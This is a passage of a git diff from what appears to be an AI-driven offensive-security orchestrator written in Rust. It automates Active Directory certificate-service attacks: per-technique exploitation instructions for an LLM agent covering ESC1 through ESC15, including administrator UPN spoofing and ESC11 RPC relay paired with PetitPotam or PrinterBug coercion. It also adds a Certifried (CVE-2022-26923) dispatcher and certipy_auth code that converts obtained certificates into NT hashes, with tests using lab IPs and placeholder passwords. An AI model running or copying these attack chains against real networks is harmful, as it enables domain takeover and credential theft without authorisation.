any other +/// DCs in state, (3) Windows member servers in state. The agent iterates +/// the list when an earlier candidate's callback drifts (a real lab +/// failure mode — see `relay_and_coerce_validation.md`). Comparison against +/// `ca_host` is case-insensitive. +fn pick_coerce_targets( + ca_host: Option<&str>, + dc_ip: Option<&str>, + domain_controllers: &std::collections::HashMap, + hosts: &[ares_core::models::Host], +) -> Vec { + let ca_lower = ca_host.map(str::to_lowercase); + let mut out: Vec = Vec::new(); + let push_unique = |out: &mut Vec, candidate: &str| { + if candidate.is_empty() { + return; + } + let cand_lower = candidate.to_lowercase(); + if ca_lower.as_deref() == Some(cand_lower.as_str()) { + return; + } + if !out.iter().any(|e| e.to_lowercase() == cand_lower) { + out.push(candidate.to_string()); + } + }; + + // Tier 1: vuln-domain DC. + if let Some(dc) = dc_ip { + push_unique(&mut out, dc); + } + // Tier 2: other DCs in state (cross-domain coercion is fine for ESC8 — + // the CA accepts any authenticated machine account). + for ip in domain_controllers.values() { + push_unique(&mut out, ip); + } + // Tier 3: Windows member servers (bypass DC callback drift). We check + // both the OS string and SMB service exposure since `os` is not always + // populated. + for h in hosts { + if h.is_dc { + continue; + } + let is_windows = h.os.to_lowercase().contains("windows") + || h.services.iter().any(|s| { + let s = s.to_lowercase(); + s.contains("microsoft-ds") || s.contains("netbios-ssn") + }); + if is_windows { + push_unique(&mut out, &h.ip); + } + } + + out +} + /// Determine the dispatch role for a given ESC type. -/// ESC8 uses coercion+relay (coercion role), while ESC1/ESC4 use certipy directly (privesc role). +/// ESC8 uses coercion+relay (coercion role), while all others use certipy directly (privesc role). fn role_for_esc_type(esc_type: &str) -> &'static str { - if esc_type == "esc8" { - "coercion" - } else { - "privesc" + match esc_type { + "esc8" | "esc11" => "coercion", + _ => "privesc", + } +} + +/// Return ESC-type-specific exploitation instructions for the LLM agent. +fn esc_instructions(esc_type: &str) -> &'static str { + match esc_type { + "esc1" => concat!( + "ESC1: Enrollee supplies Subject Alternative Name (SAN).\n", + "Use certipy_request with template, ca (CA name), upn='administrator@',\n", + "dc_ip (domain controller), target (CA server IP from ca_host field),\n", + "and sid (use admin_sid from payload, e.g. S-1-5-21-...-500).\n", + "IMPORTANT: The 'target' param MUST be the CA server (ca_host), NOT the DC.\n", + "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n", + "Then use certipy_auth with the resulting .pfx to get the NT hash." + ), + "esc2" => concat!( + "ESC2: Any Purpose EKU allows client auth.\n", + "Use certipy_request with template, ca, dc_ip, target=ca_host, and sid=admin_sid.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n", + "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n", + "Then use certipy_auth with the resulting .pfx." + ), + "esc3" => concat!( + "ESC3: Certificate Request Agent (enrollment agent).\n", + "Step 1: certipy_request the CRA template with target=ca_host.\n", + "Step 2: Use that cert to request a cert on behalf of administrator.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip." + ), + "esc4" => concat!( + "ESC4: Template ACL abuse — attacker has GenericAll on a template.\n", + "Use certipy_esc4_full_chain which modifies the template to be ESC1-vulnerable,\n", + "requests a cert as administrator, then restores the original template.\n", + "IMPORTANT: Set target to the ca_host IP for certificate enrollment." + ), + "esc6" => concat!( + "ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA.\n", + "Use certipy_request with any template that allows client auth,\n", + "adding upn='administrator@', target=ca_host, and sid=admin_sid.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n", + "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch.\n", + "Then use certipy_auth with the resulting .pfx." + ), + "esc7" => concat!( + "ESC7: ManageCA privilege abuse.\n", + "Use certipy_esc7_full_chain to execute the full chain: add-officer → request SubCA cert (denied) → issue pending request → retrieve cert → authenticate.\n", + "IMPORTANT: Set target to the ca_host IP (CA server, not DC).\n", + "IMPORTANT: Include 'sid' param (admin_sid from payload) to avoid SID mismatch in certipy v5.\n", + "The tool handles all 5 steps automatically and returns the NT hash." + ), + "esc9" => concat!( + "ESC9: GenericAll on a user allows UPN spoofing.\n", + "If you have GenericAll on a user, change their UPN to administrator@,\n", + "request a cert using the modified user, then restore the original UPN.\n", + "Use certipy_request (with target=ca_host) then certipy_auth.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip." + ), + "esc10" => concat!( + "ESC10: Weak Certificate Mapping (StrongCertificateBindingEnforcement=0).\n", + "The DC does not enforce strong cert-to-account binding.\n", + "Use certipy_request with template, ca, target=ca_host, and sid=admin_sid.\n", + "The -sid flag embeds the target SID in the cert, bypassing weak mapping.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n", + "Then use certipy_auth with the resulting .pfx." + ), + "esc11" => concat!( + "ESC11: RPC relay to ICPR certificate enrollment (IF_ENFORCEENCRYPTICERTREQUEST disabled).\n", + "Use certipy_relay with target='rpc://' and ca=.\n", + "This starts a relay listener that accepts coerced NTLM auth and relays it\n", + "to the CA's RPC enrollment endpoint to obtain a certificate.\n", + "Combine with coercion (PetitPotam, PrinterBug) to trigger auth from a DC.\n", + "After relay captures a cert, use certipy_auth with the .pfx." + ), + "esc13" => concat!( + "ESC13: Issuance Policy linked to a group.\n", + "Use certipy_request with the ESC13 template and target=ca_host.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n", + "Then use certipy_auth with the resulting .pfx." + ), + "esc15" => concat!( + "ESC15 (CVE-2024-49019): Application policy OID abuse.\n", + "Use certipy_request with template, ca, target=ca_host,\n", + "and application_policies= (e.g. '1.3.6.1.5.5.7.3.2' for Client Authentication).\n", + "The application policy OID overrides the template's EKU restrictions.\n", + "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n", + "Then use certipy_auth with the resulting .pfx." + ), + _ => "Use certipy_request with the template and CA, then certipy_auth with the .pfx. Set target to ca_host.", } } @@ -319,7 +607,13 @@ struct AdcsExploitWork { ca_host: Option, domain: String, dc_ip: Option, + domain_sid: Option, credential: Option, + /// Tier-ordered coerce target candidates (esc8/esc11 only). Empty for + /// non-coercion ESC types. The dispatcher passes the first as + /// `coerce_target` (legacy) and the full list as `coerce_targets` so the + /// agent can iterate when the first target's callback drifts. + coerce_candidates: Vec, } #[cfg(test)] @@ -353,11 +647,29 @@ mod tests { #[test] fn is_exploitable_esc_type_positive() { assert!(is_exploitable_esc_type("esc1")); + assert!(is_exploitable_esc_type("esc2")); + assert!(is_exploitable_esc_type("esc3")); assert!(is_exploitable_esc_type("esc4")); + assert!(is_exploitable_esc_type("esc6")); + assert!(is_exploitable_esc_type("esc7")); assert!(is_exploitable_esc_type("esc8")); + assert!(is_exploitable_esc_type("esc9")); + assert!(is_exploitable_esc_type("esc10")); + assert!(is_exploitable_esc_type("esc11")); + assert!(is_exploitable_esc_type("esc13")); + assert!(is_exploitable_esc_type("esc15")); assert!(is_exploitable_esc_type("adcs_esc1")); + assert!(is_exploitable_esc_type("adcs_esc2")); + assert!(is_exploitable_esc_type("adcs_esc3")); assert!(is_exploitable_esc_type("adcs_esc4")); + assert!(is_exploitable_esc_type("adcs_esc6")); + assert!(is_exploitable_esc_type("adcs_esc7")); assert!(is_exploitable_esc_type("adcs_esc8")); + assert!(is_exploitable_esc_type("adcs_esc9")); + assert!(is_exploitable_esc_type("adcs_esc10")); + assert!(is_exploitable_esc_type("adcs_esc11")); + assert!(is_exploitable_esc_type("adcs_esc13")); + assert!(is_exploitable_esc_type("adcs_esc15")); } #[test] @@ -370,13 +682,13 @@ mod tests { #[test] fn is_exploitable_esc_type_negative() { - assert!(!is_exploitable_esc_type("esc2")); - assert!(!is_exploitable_esc_type("esc3")); + assert!(!is_exploitable_esc_type("esc5")); + assert!(!is_exploitable_esc_type("esc14")); assert!(!is_exploitable_esc_type("rbcd")); assert!(!is_exploitable_esc_type("shadow_credentials")); assert!(!is_exploitable_esc_type("genericall")); assert!(!is_exploitable_esc_type("")); - assert!(!is_exploitable_esc_type("adcs_esc2")); + assert!(!is_exploitable_esc_type("adcs_esc5")); } // normalize_esc_type @@ -709,6 +1021,11 @@ mod tests { assert_eq!(role_for_esc_type("esc8"), "coercion"); } + #[test] + fn role_for_esc11_is_coercion() { + assert_eq!(role_for_esc_type("esc11"), "coercion"); + } + #[test] fn role_for_esc1_is_privesc() { assert_eq!(role_for_esc_type("esc1"), "privesc"); @@ -719,6 +1036,16 @@ mod tests { assert_eq!(role_for_esc_type("esc4"), "privesc"); } + #[test] + fn role_for_esc10_is_privesc() { + assert_eq!(role_for_esc_type("esc10"), "privesc"); + } + + #[test] + fn role_for_esc15_is_privesc() { + assert_eq!(role_for_esc_type("esc15"), "privesc"); + } + #[test] fn role_for_unknown_defaults_to_privesc() { assert_eq!(role_for_esc_type("esc99"), "privesc"); @@ -830,4 +1157,130 @@ mod tests { ); assert_eq!(extract_account_name(&details), None); } + + // pick_coerce_targets + + fn windows_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: "Windows Server 2019".to_string(), + roles: Vec::new(), + services: vec!["microsoft-ds".to_string()], + is_dc: false, + owned: false, + } + } + + fn dc_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: "Windows Server 2019".to_string(), + roles: Vec::new(), + services: vec!["microsoft-ds".to_string()], + is_dc: true, + owned: false, + } + } + + fn linux_host(ip: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: format!("linux-{ip}"), + os: "Ubuntu 22.04".to_string(), + roles: Vec::new(), + services: vec!["ssh".to_string()], + is_dc: false, + owned: false, + } + } + + #[test] + fn pick_coerce_targets_prefers_vuln_domain_dc() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.20".to_string())] + .into_iter() + .collect(); + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &[]); + assert_eq!(out, vec!["192.168.58.20".to_string()]); + } + + #[test] + fn pick_coerce_targets_excludes_ca_host() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.10".to_string())] + .into_iter() + .collect(); + let out = pick_coerce_targets( + Some("192.168.58.10"), + Some("192.168.58.10"), + &dcs, + &[windows_host("192.168.58.10", "ca-and-dc")], + ); + assert!(out.is_empty(), "CA host must not appear: {out:?}"); + } + + #[test] + fn pick_coerce_targets_falls_back_to_member_servers() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.10".to_string())] + .into_iter() + .collect(); + let hosts = vec![ + dc_host("192.168.58.10", "dc01"), + windows_host("192.168.58.51", "ws01"), + linux_host("192.168.58.99"), + ]; + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.10"), &dcs, &hosts); + // CA excluded; only Windows non-DC member server remains. + assert_eq!(out, vec!["192.168.58.51".to_string()]); + } + + #[test] + fn pick_coerce_targets_orders_dc_then_other_dcs_then_members() { + let dcs: HashMap = [ + ("contoso.local".to_string(), "192.168.58.20".to_string()), + ("fabrikam.local".to_string(), "192.168.58.30".to_string()), + ] + .into_iter() + .collect(); + let hosts = vec![windows_host("192.168.58.51", "ws01")]; + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts); + // Tier 1 (vuln-domain DC) first. + assert_eq!(out[0], "192.168.58.20"); + // Tier 2 (other DC) and Tier 3 (member) both present, no CA. + assert!(out.contains(&"192.168.58.30".to_string())); + assert!(out.contains(&"192.168.58.51".to_string())); + assert!(!out.contains(&"192.168.58.10".to_string())); + } + + #[test] + fn pick_coerce_targets_dedups_dc_appearing_in_hosts_list() { + let dcs: HashMap = + [("contoso.local".to_string(), "192.168.58.20".to_string())] + .into_iter() + .collect(); + let hosts = vec![dc_host("192.168.58.20", "dc01")]; + let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts); + assert_eq!(out, vec!["192.168.58.20".to_string()]); + } + + #[test] + fn pick_coerce_targets_ca_match_is_case_insensitive() { + let dcs: HashMap = HashMap::new(); + let hosts = vec![windows_host("DC01.contoso.local", "dc01")]; + let out = pick_coerce_targets(Some("dc01.contoso.local"), None, &dcs, &hosts); + assert!( + out.is_empty(), + "CA hostname (case-mismatched) must be excluded" + ); + } + + #[test] + fn pick_coerce_targets_empty_when_no_inputs() { + let dcs: HashMap = HashMap::new(); + let out = pick_coerce_targets(Some("192.168.58.10"), None, &dcs, &[]); + assert!(out.is_empty()); + } } diff --git a/ares-cli/src/orchestrator/automation/bloodhound.rs b/ares-cli/src/orchestrator/automation/bloodhound.rs index 8b805cea..f2c1342c 100644 --- a/ares-cli/src/orchestrator/automation/bloodhound.rs +++ b/ares-cli/src/orchestrator/automation/bloodhound.rs @@ -40,7 +40,7 @@ pub async fn auto_bloodhound(dispatcher: Arc, mut shutdown: watch::R .iter() .filter(|d| !state.is_processed(DEDUP_BLOODHOUND_DOMAINS, d)) .filter_map(|domain| { - let dc_ip = state.domain_controllers.get(domain).cloned()?; + let dc_ip = state.resolve_dc_ip(domain)?; // Select best credential for this specific domain let cred = find_domain_credential( domain, diff --git a/ares-cli/src/orchestrator/automation/certifried.rs b/ares-cli/src/orchestrator/automation/certifried.rs new file mode 100644 index 00000000..ed15806d --- /dev/null +++ b/ares-cli/src/orchestrator/automation/certifried.rs @@ -0,0 +1,485 @@ +//! auto_certifried -- CVE-2022-26923 machine account DNS hostname spoofing. +//! +//! Certifried abuses the fact that machine accounts can enroll for certificates +//! and the DNS hostname in the certificate is derived from the machine account's +//! dNSHostName attribute. By creating a machine account and setting its +//! dNSHostName to a DC's hostname, you can obtain a certificate that +//! authenticates as the DC. +//! +//! Prerequisites: +//! - MachineAccountQuota > 0 (default 10) +//! - Valid domain credential +//! - ADCS CA discovered +//! +//! Dispatches to "privesc" role with technique "certifried". + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect certifried work items from current state. +/// +/// Pure logic extracted from `auto_certifried` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_certifried_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let dedup_key = format!("certifried:{}", domain.to_lowercase()); + if state.is_processed(DEDUP_CERTIFRIED, &dedup_key) { + continue; + } + + // Find the DC host to get its hostname for spoofing + let dc_hostname = state + .hosts + .iter() + .find(|h| h.ip == *dc_ip && h.is_dc) + .map(|h| h.hostname.clone()) + .filter(|h| !h.is_empty()); + + // Certifried creates a machine account in the TARGET domain via MAQ. + // Cross-forest credentials cannot create machine accounts in a foreign + // forest, so require a credential whose domain matches the target. + let cred = match state.credentials.iter().find(|c| { + c.domain.to_lowercase() == domain.to_lowercase() + && !c.password.is_empty() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) { + Some(c) => c.clone(), + None => continue, + }; + + items.push(CertifriedWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + dc_hostname, + credential: cred, + }); + } + + items +} + +/// Dispatches certifried (CVE-2022-26923) per domain with ADCS. +/// Interval: 45s. +pub async fn auto_certifried(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("certifried") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_certifried_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "certifried", + "cve": "CVE-2022-26923", + "target_ip": item.dc_ip, + "domain": item.domain, + "dc_hostname": item.dc_hostname, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("certifried"); + match dispatcher + .throttled_submit("exploit", "privesc", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Certifried (CVE-2022-26923) dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CERTIFRIED, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CERTIFRIED, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Certifried deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch certifried"); + } + } + } + } +} + +struct CertifriedWork { + dedup_key: String, + domain: String, + dc_ip: String, + dc_hostname: Option, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + // --- collect_certifried_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "certifried:contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_CERTIFRIED, "certifried:contoso.local".into()); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_domains() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dc_hostname_resolved_from_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_hostname, Some("dc01.contoso.local".into())); + } + + #[test] + fn collect_dc_hostname_none_when_no_host_match() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dc_hostname.is_none()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_when_only_cross_forest_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + // Certifried needs a target-domain credential to create a machine + // account in the target forest; cross-forest creds cannot do this. + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_certifried_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_certifried_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "certifried:contoso.local"); + } + + #[test] + fn dedup_key_format() { + let key = format!("certifried:{}", "contoso.local"); + assert_eq!(key, "certifried:contoso.local"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("certifried:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "certifried:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CERTIFRIED, "certifried"); + } + + #[test] + fn dc_hostname_from_hosts() { + // Simulates finding a DC hostname from hosts list + let hostname = "dc01.contoso.local"; + let filtered = Some(hostname.to_string()).filter(|h| !h.is_empty()); + assert_eq!(filtered, Some("dc01.contoso.local".to_string())); + + let empty = Some("".to_string()).filter(|h| !h.is_empty()); + assert!(empty.is_none()); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = serde_json::json!({ + "technique": "certifried", + "cve": "CVE-2022-26923", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "dc_hostname": "dc01.contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "certifried"); + assert_eq!(payload["cve"], "CVE-2022-26923"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["dc_hostname"], "dc01.contoso.local"); + } + + #[test] + fn payload_without_dc_hostname() { + let payload = serde_json::json!({ + "technique": "certifried", + "cve": "CVE-2022-26923", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "dc_hostname": null, + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert!(payload["dc_hostname"].is_null()); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CertifriedWork { + dedup_key: "certifried:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + dc_hostname: Some("dc01.contoso.local".into()), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.dc_hostname, Some("dc01.contoso.local".into())); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn work_struct_without_hostname() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CertifriedWork { + dedup_key: "certifried:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + dc_hostname: None, + credential: cred, + }; + assert!(work.dc_hostname.is_none()); + } +} diff --git a/ares-cli/src/orchestrator/automation/certipy_auth.rs b/ares-cli/src/orchestrator/automation/certipy_auth.rs new file mode 100644 index 00000000..af498b33 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/certipy_auth.rs @@ -0,0 +1,749 @@ +//! auto_certipy_auth -- authenticate using obtained certificates. +//! +//! After ADCS exploitation (ESC1/ESC4/ESC8) obtains a certificate (.pfx), +//! this automation dispatches `certipy auth` to convert the certificate +//! into an NT hash, enabling pass-the-hash for the impersonated user. +//! +//! Watches for `certificate_obtained` vulnerability type in discovered_vulnerabilities +//! which is registered by the ADCS exploitation result processor. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Authenticates with obtained certificates to extract NT hashes. +/// Interval: 30s. +pub async fn auto_certipy_auth(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("certipy_auth") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_cert_auth_work(&state) + }; + + for item in work { + let mut payload = json!({ + "technique": "certipy_auth", + "vuln_id": item.vuln_id, + "pfx_path": item.pfx_path, + "domain": item.domain, + "target_user": item.target_user, + }); + + if let Some(ref dc) = item.dc_ip { + payload["target_ip"] = json!(dc); + payload["dc_ip"] = json!(dc); + } + + let priority = dispatcher.effective_priority("certipy_auth"); + match dispatcher + .throttled_submit("credential_access", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + vuln_id = %item.vuln_id, + user = %item.target_user, + "Certificate authentication dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CERTIPY_AUTH, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CERTIPY_AUTH, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(vuln_id = %item.vuln_id, "Certificate auth deferred"); + } + Err(e) => { + warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch cert auth"); + } + } + } + } +} + +/// Pure logic extracted from `auto_certipy_auth` so it can be unit-tested without +/// needing a `Dispatcher` or async runtime (beyond state construction). +fn collect_cert_auth_work(state: &crate::orchestrator::state::StateInner) -> Vec { + state + .discovered_vulnerabilities + .values() + .filter_map(|vuln| { + let vtype = vuln.vuln_type.to_lowercase(); + if vtype != "certificate_obtained" && vtype != "adcs_certificate" { + return None; + } + + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + return None; + } + + let dedup_key = format!("cert_auth:{}", vuln.vuln_id); + if state.is_processed(DEDUP_CERTIPY_AUTH, &dedup_key) { + return None; + } + + let pfx_path = vuln + .details + .get("pfx_path") + .or_else(|| vuln.details.get("certificate_path")) + .or_else(|| vuln.details.get("cert_file")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string())?; + + let domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + + let target_user = vuln + .details + .get("target_user") + .or_else(|| vuln.details.get("upn")) + .or_else(|| vuln.details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator") + .to_string(); + + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + Some(CertAuthWork { + vuln_id: vuln.vuln_id.clone(), + dedup_key, + pfx_path, + domain, + target_user, + dc_ip, + }) + }) + .collect() +} + +struct CertAuthWork { + vuln_id: String, + dedup_key: String, + pfx_path: String, + domain: String, + target_user: String, + dc_ip: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("cert_auth:{}", "vuln-cert-001"); + assert_eq!(key, "cert_auth:vuln-cert-001"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CERTIPY_AUTH, "certipy_auth"); + } + + #[test] + fn cert_vuln_types_accepted() { + let types = [ + "certificate_obtained", + "adcs_certificate", + "CERTIFICATE_OBTAINED", + ]; + for t in &types { + let lower = t.to_lowercase(); + assert!( + lower == "certificate_obtained" || lower == "adcs_certificate", + "{t} should match" + ); + } + } + + #[test] + fn non_cert_vuln_types_rejected() { + let non_cert = ["esc1", "smb_signing_disabled", "mssql_access"]; + for t in &non_cert { + let lower = 